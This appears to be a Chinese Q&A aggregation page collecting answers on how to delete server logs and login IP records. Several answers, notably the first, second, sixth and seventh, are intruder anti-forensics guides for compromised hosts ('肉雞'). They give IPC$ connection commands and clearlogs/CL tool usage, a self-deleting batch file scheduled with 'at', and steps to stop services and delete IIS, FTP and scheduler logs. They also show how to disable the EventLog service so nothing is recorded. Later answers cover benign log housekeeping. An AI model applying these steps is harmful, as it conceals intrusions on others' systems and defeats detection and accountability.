容錯伺服器怎麼刪除日誌ip

❶ 怎樣刪除系統日誌

系統日誌 通過手工很難清除. 這里介紹一個工具 clearlog.exe

使用方法:
Usage: clearlogs [\\computername] <-app / -sec / -sys>

-app = 應用程序日誌
-sec = 安全日誌
-sys = 系統日誌
a. 可以清除遠程計算機的日誌
** 先用ipc連接上去: net use \\ip\ipc$ 密碼/user:用戶名
** 然後開始清除: 方法
clearlogs \\ip -app 這個是清除遠程計算機的應用程序日誌
clearlogs \\ip -sec 這個是清除遠程計算機的安全日誌
clearlogs \\ip -sys 這個是清除遠程計算機的系統日誌

b.清除本機日誌: 如果和遠程計算機的不能空連接. 那麼就需要把這個工具傳到遠程計算機上面
然後清除. 方法:

clearlogs -app 這個是清除遠程計算機的應用程序日誌
clearlogs -sec 這個是清除遠程計算機的安全日誌
clearlogs -sys 這個是清除遠程計算機的系統罩?

安全日誌已經被清除.Success: The log has been cleared 成功.

為了更安全一點.同樣你也可以建立一個批處理文件.讓自動清除. 做好批處理文件.然後用at命令建立一個計劃任務. 讓自動運行. 之後你就可以離開你的肉雞了.
例如建立一個 c.bat

rem ============================== 開始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 結束

在你的計算機上面測試的時候 可以不要 @echo off 可以顯示出來. 你可以看到結果
第一行表示: 運行時不顯示窗口
第二行表示: 清除應用程序日誌
第三行表示: 清除安全日誌
第四行表示: 清除系統日誌
第五行表示: 刪除 clearlogs.exe 這個工具
第六行表示: 刪除 c.bat 這個批處理文件
第七行表示: 退出

用AT命令. 建立一個計劃任務. 這個命令在原來的教程裡面和雜志裡面都有. 你可以去看看詳細的使用方法

AT 時間 c:\c.bat

之後你就可以安全離開了. 這樣才更安全一點.

❷ 如何刪除安全日誌啊

以WINDOWS2000為例!
Windows2000的日誌文件通常有應用程序日誌，安全日誌、系統日誌、DNS伺服器日誌、ftp日誌、WWW日誌等等，可能會根據伺服器所開啟的服務不同。當我們用流光探測時，比如說IPC探測，就會在安全日誌里迅速地記下流光探測時所用的用戶名、時間等等，用FTP探測後，也會立刻在FTP日誌中記下IP、時間、探測所用的用戶名和密碼等等。甚至連流影啟動時需要msvcp60.dll這個動庫鏈接庫，如果伺服器沒有這個文件都會在日誌里記錄下來，這就是為什麼不要拿國內主機探測的原因了，他們記下你的IP後會很容易地找到你，只要他想找你！！還有Scheler日誌這也是個重要的LOG，你應該知道經常使用的srv.exe就是通過這個服務來啟動的，其記錄著所有由Scheler服務啟動的所有行為，如服務的啟動和停止。
日誌文件默認位置：
應用程序日誌、安全日誌、系統日誌、DNS日誌默認位置：%sys temroot%\sys tem32\config，默認文件大小512KB，管理員都會改變這個默認大小。
安全日誌文件：%sys temroot%\sys tem32\config\SecEvent.EVT
系統日誌文件：%sys temroot%\sys tem32\config\SysEvent.EVT
應用程序日誌文件：%sys temroot%\sys tem32\config\AppEvent.EVT
Internet信息服務FTP日誌默認位置：%sys temroot%\sys tem32\logfiles\msftpsvc1\，默認每天一個日誌
Internet信息服務WWW日誌默認位置：%sys temroot%\sys tem32\logfiles\w3svc1\，默認每天一個日誌
Scheler服務日誌默認位置：%sys temroot%\schedlgu.txt

以上日誌在注冊表裡的鍵：
應用程序日誌，安全日誌，系統日誌，DNS伺服器日誌，它們這些LOG文件在注冊表中的：
HKEY_LOCAL_MACHINE\sys tem\CurrentControlSet\Services\Eventlog
有的管理員很可能將這些日誌重定位。其中EVENTLOG下面有很多的子表，裡面可查到以上日誌的定位目錄。
Schedluler服務日誌在注冊表中
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchelingAgent

FTP和WWW日誌詳解：
FTP日誌和WWW日誌默認情況，每天生成一個日誌文件，包含了該日的一切記錄，文件名通常為ex（年份）（月份）（日期），例如ex001023，就是2000年10月23日產生的日誌，用記事本就可直接打開，如下例：
#Software: Microsoft Internet Information Services 5.0 （微軟IIS5.0）
#Version: 1.0 （版本1.0）
#Date: 20001023 0315 （服務啟動時間日期）
#Fields: time cip csmethod csuristem scstatus
0315 127.0.0.1 [1]USER administator 331 （IP地址為127.0.0.1用戶名為administator試圖登錄）
0318 127.0.0.1 [1]PASS – 530 （登錄失敗）
032:04 127.0.0.1 [1]USER nt 331 （IP地址為127.0.0.1用戶名為nt的用戶試圖登錄）
032:06 127.0.0.1 [1]PASS – 530 （登錄失敗）
032:09 127.0.0.1 [1]USER cyz 331 （IP地址為127.0.0.1用戶名為cyz的用戶試圖登錄）
0322 127.0.0.1 [1]PASS – 530 （登錄失敗）
0322 127.0.0.1 [1]USER administrator 331 （IP地址為127.0.0.1用戶名為administrator試圖登錄）
0324 127.0.0.1 [1]PASS – 230 （登錄成功）
0321 127.0.0.1 [1]MKD nt 550 （新建目錄失敗）
0325 127.0.0.1 [1]QUIT – 550 （退出FTP程序）

從日誌里就能看出IP地址為127.0.0.1的用戶一直試圖登錄系統，換了四次用戶名和密碼才成功，管理員立即就可以得知管理員的入侵時間、IP地址以及探測的用戶名，如上例入侵者最終是用administrator用戶名進入的，那麼就要考慮更換此用戶名的密碼，或者重命名administrator用戶。

WWW日誌
WWW服務同FTP服務一樣，產生的日誌也是在%sys temroot%\sys tem32\LogFiles\W3SVC1目錄下，默認是每天一個日誌文件，下面是一個典型的WWW日誌文件
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 20001023 03:091
#Fields: date time cip csusername sip sport csmethod csuristem csuriquery scstatus cs(UserAgent)
20001023 03:091 192.168.1.26 192.168.1.37 80 GET /iisstart.asp 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
20001023 03:094 192.168.1.26 192.168.1.37 80 GET /pagerror.gif 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)

通過分析第六行，可以看出2000年10月23日，IP地址為192.168.1.26的用戶通過訪問IP地址為192.168.1.37機器的80埠，查看了一個頁面iisstart.asp,這位用戶的瀏覽器為compatible;+MSIE+5.0;+Windows+98+DigExt，有經驗的管理員就可通過安全日誌、FTP日誌和WWW日誌來確定入侵者的IP地址以及入侵時間。
既使你刪掉FTP和WWW日誌，但是還是會在系統日誌和安全日誌里記錄下來，但是較好的是只顯示了你的機器名，並沒有你的IP，例如上面幾個探測之後，系統日誌
將會產生下面的記錄：

一眼就能看出2000年10月23日，16點17分，系統因為某些事件出現警告，雙擊頭一個，打開它的屬性：

屬性里記錄了出現警告的原因，是因為有人試圖用administator用戶名登錄，出現一個錯誤，來源是FTP服務。
同時安全記錄里寫將同時記下：（Ekin:此圖不是此次示例的安全日誌）

在上圖中可以看到兩種圖標：鑰匙（表示成功）和鎖（表示當用戶在做什麼時被系統停止）。接連四個鎖圖標，表示四次失敗審核，事件類型是帳戶登錄和登錄、注銷失敗，日期為2000年10月18日，時間為1002，這就需要重點觀察。
雙點第一個失敗審核事件的，即得到此事件的詳細描述，如下圖12所示：

分析上圖，我們可以得知有個CYZ的工作站，用administator用戶名登錄本機，但是因為用戶名未知或密碼錯誤（實際為密碼錯誤）未能成功。
另外還有DNS伺服器日誌，不太重要，就此略過（其實是我沒有看過它）

知道了Windows2000日誌的詳細情況，下面就要學會怎樣刪除這些日誌：
通過上面，得知日誌文件通常有某項服務在後台保護，除了系統日誌、安全日誌、應用程序日誌等等，它們的服務是Windos2000的關鍵進程，而且與注冊表文件在一塊，當Windows2000啟動後，啟動服務來保護這些文件，所以很難刪除，而FTP日誌和WWW日誌以及Scedlgu日誌都是可以輕易地刪除的。
首先要取得Admnistrator密碼或Administrators組成員之一，然後Telnet到遠程主機，先來試著刪除FTP日誌：
D:\SERVER>del schedlgu.txt
D:\SERVER\SchedLgU.Txt
進程無法訪問文件，因為另一個程序正在使用此文件。
說過了，後台有服務保護，先把服務停掉！
D:\SERVER>net stop "task scheler"
下面的服務依賴於 Task Scheler 服務。
停止 Task Scheler 服務也會停止這些服務。

Remote Storage Engine

是否繼續此操作? (Y/N) [N]: y
Remote Storage Engine 服務正在停止....
Remote Storage Engine 服務已成功停止。

Task Scheler 服務正在停止.
Task Scheler 服務已成功停止。
OK，它的服務停掉了，同時也停掉了與它有依賴關系的服務。再來試著刪一下！
D:\SERVER>del schedlgu.txt
D:\SERVER>
沒有反應？成功了！下一個是FTP日誌和WWW日誌，原理都是一樣，先停掉相關服務，然後再刪日誌！
D:\SERVER\sys tem32\LogFiles\MSFTPSVC1>del ex*.log

D:\SERVER\sys tem32\LogFiles\MSFTPSVC1>
以上操作成功刪除FTP日誌！再來WWW日誌！
D:\SERVER\sys tem32\LogFiles\W3SVC1>del ex*.log

D:\SERVER\sys tem32\LogFiles\W3SVC1>
OK！恭喜，現在簡單的日誌都已成功刪除。下面就是很難的安全日誌和系統日誌了，守護這些日誌的服務是Event Log，試著停掉它！
D:\SERVER\sys tem32\LogFiles\W3SVC1>net stop eventlog
這項服務無法接受請求的 "暫停" 或 "停止" 操作。
KAO，I 服了 U，沒辦法，它是關鍵服務。如果不用第三方工具，在命令行上根本沒有刪除安全日誌和系統日誌的可能！所以還是得用雖然簡單但是速度慢得死機的辦法：打開「控制面板」的「管理工具」中的「事件查看器」（98沒有，知道用Win2k的好處了吧），在菜單的「操作」項有一個名為「連接到另一台計算機」的菜單，點擊它如下圖所示：

輸入遠程計算機的IP，然後點支煙，等上數十分鍾，忍受象死機的折磨，然後打開下圖：

選擇遠程計算機的安全性日誌，右鍵選擇它的屬性：

點擊屬性里的「清除日誌」按鈕，OK！安全日誌清除完畢！同樣的忍受痛苦去清除系統日誌！
目前在不藉助第三工具的情況下，能很快，很順利地清除FTP、WWW還有Schedlgu日誌，就是系統日誌和安全日誌屬於Windows2000的嚴密守護，只能用本地的事件查看器來打開它，因為在圖形界面下，加之網速又慢，如果你銀子多，時間閑，還是可以清除它的。綜上所述，介紹了Windows2000的日誌文件以及刪除方法，但是你必須是Administrator，注意必須作為管理員或管理組的成員登錄才能打開安全日誌記錄。該過程適用於 Windows 2000 Professional 計算機，也適用於作為獨立伺服器或成員伺服器運行的 Windows 2000 Server 計算機。

至此，Windows2000安全知識基礎講座完畢，還有幾句話要講，大家也看出來了，雖然FTP等等日誌可以很快清除，但是系統日誌和安全日誌卻不是那麼快、那麼順利地能刪除，如果遇到聰明的管理員，將日誌文件轉移到另一個地方，那更是難上加難，所以奉勸大家，千萬不要拿國內的主機做試驗，國內的法律很嚴呀！今天吃飯時，聽說有兩個人開玩笑，一個人把另外一個人的東西藏起來了，結果那個人一急，報案了，於是藏東西那個人被判四年刑！！法官說法律是不開玩笑的！！！所以大家一定要牢記這點！(不要說我老生常談)
如果大家有什麼不明白地方，可以繼續提問！謝謝！

❸ 開機日誌怎麼刪

方法如下：

1. 打開「我的電腦」，

2. C盤Windows目錄下找到一個SchedLgU．txt。

3. 它是「計劃任務」的日誌，會忠實地記錄電腦計劃任務的執行情況，還有每次開機啟動Windows系統的信息。

4. 雙擊打開SchedLgU．txt文件，並清除裡面的內容，然後點擊「文件」菜單－－保存－－關閉即可

5. 當然，如果要刪除一條，就在文本裡面找對應時間的項目。

   

❹ 如何清理ip登錄記錄

伺服器的IIS裡面有一個設置日誌的地方，這個日誌本身就記錄了訪問IP、獲取內容、時間日期等信息。一般伺服器的日誌如果長時間不清理，系統盤就快沒空間了。日訪問1萬的伺服器一天也能記錄出幾十到幾百M的信息。只要用記事本打開即可。

具體的統計需要工具，因為我伺服器就自己一個網站，日誌只用來查詢不做分析，所以不是很清楚。剛才搜了下，估計用「伺服器」「日誌」「log」「分析」「統計」組合一下能找到。當然，自己編個小程序轉存到資料庫里就方便多了。（個人感覺，對於統計而言，這個日誌過度詳細了。）
想清除，直接刪除就好了。

❺ Windows Server 2008 R2 如何刪除用戶登陸記錄（登陸用戶名、IP等）

刪除路徑：
C:\Documents and Settings\用戶文件夾\Application Data\Microsoft\Microsoft SQL Server\100\Tools\Shell下面的SqlStudio.bin文件即可。
對於Application Data這層路徑可能打不開，不過直接復制整個路徑過去，把用戶文件夾名稱修改一下就可以打了。
刪除之後再打開SSMS就會發現所有的伺服器信息和用戶登陸信息都已經被清掉了。
求採納，萌萌噠

❻ 如何清理伺服器裡面的日誌

使用CL這個工具可以清理IIS日誌、FTP日誌、計劃任務日誌、系統日誌、清理服務日誌只需要執行CL工具的清理命令：

清理服務日誌:cl -logfiles 127.0.0.1 (程序自動先把FTP.www.Task Scheler服務停止再刪除日誌,然後再啟動三個服務。)
清理系統日誌:cl -enentlog all
此工具支持遠程清理,當然前提必須是建立了管理員許可權的IPC管理連接。
連接命令:net use \\ip\ipc$ 密碼/user:用戶名
然後用CL -LogFile IP對主機進行遠程清理了。

❼ 手工清除伺服器日誌

在入侵過程中，遠程主機的Windows系統會對入侵者的登錄、注銷、連接，甚至復制文件等操作都進行記錄，並把這些記錄保存到日誌文件中。在這些日誌文件中，記錄著入侵者登錄所用的賬號，以及入侵者的IP地址等信息。入侵者可以通過多種途徑來擦除入侵留下的痕跡，其中手段之一就是用伺服器日誌進行手動清除。

具體的操作步驟如下。

步驟1：先使用管理員賬號與遠程主機建立IPC$連接，在遠程主機的【控制面板】窗口中雙擊【管理工具】圖標，即可打開【管理工具】窗口。雙擊【計算機管理】圖標項，即可打開【計算機管理】窗口。

步驟2：在其右邊列表中展開【計算機管理（本地）】→【系統工具】→【事件查看器】選項，即可打開事件日誌窗格，如圖8-35所示。其中的事件日誌分為"應用程序"日誌、"安全性"日誌及"系統"日誌3種，這3種日誌分別記錄了不同種類的事件。

步驟3：用滑鼠右鍵單擊要刪除的日誌文件，在彈出的快捷菜單中選擇【清除】命令，即可清除選中的日誌。如果想徹底刪除日誌文件，則可以在【計算機管理】窗口的左窗格中展開【計算機管理（本地）】→【服務和應用程序】→【服務】選項，再在其右窗格中用滑鼠右健單擊【EventLog】服務，在彈出的快捷菜單中選擇【屬性】命令，在打開的【屬性】對話框中把該服務禁用，如圖8-36所示。

（點擊查看大圖）圖8-35【計算機管理】窗口中的事件記錄窗格

（點擊查看大圖）圖8-36禁用"EventLog"服務

此後，用戶只要重新啟動系統，該主機/伺服器就不會對任何操作進行日誌記錄了。

❽ 怎麼清除網站後台登錄IP的日誌記錄

一般網站都會記錄登陸者的相關信息（包括機器名，IP，用戶賬號，相關瀏覽器等）作為安全日誌的。如果要刪除的話，後台管理員一般都可以刪除部分日誌的。但是也有些網站的日誌是不可刪除的，除非你能攻破他的資料庫。

❾ 伺服器 登陸ip記錄怎麼清除掉

伺服器的IIS裡面有一個設置日誌的地方，這個日誌本身就記錄了訪問IP、獲取內容、時間日期等信息。一般伺服器的日誌如果長時間不清理，系統盤就快沒空間了。日訪問1萬的伺服器一天也能記錄出幾十到幾百M的信息。只要用記事本打開即可。
具體的統計需要工具，因為我伺服器就自己一個網站，日誌只用來查詢不做分析，所以不是很清楚。剛才搜了下，估計用「伺服器」「日誌」「log」「分析」「統計」組合一下能找到。當然，自己編個小程序轉存到資料庫里就方便多了。（個人感覺，對於統計而言，這個日誌過度詳細了。）
想清除，直接刪除就好了。​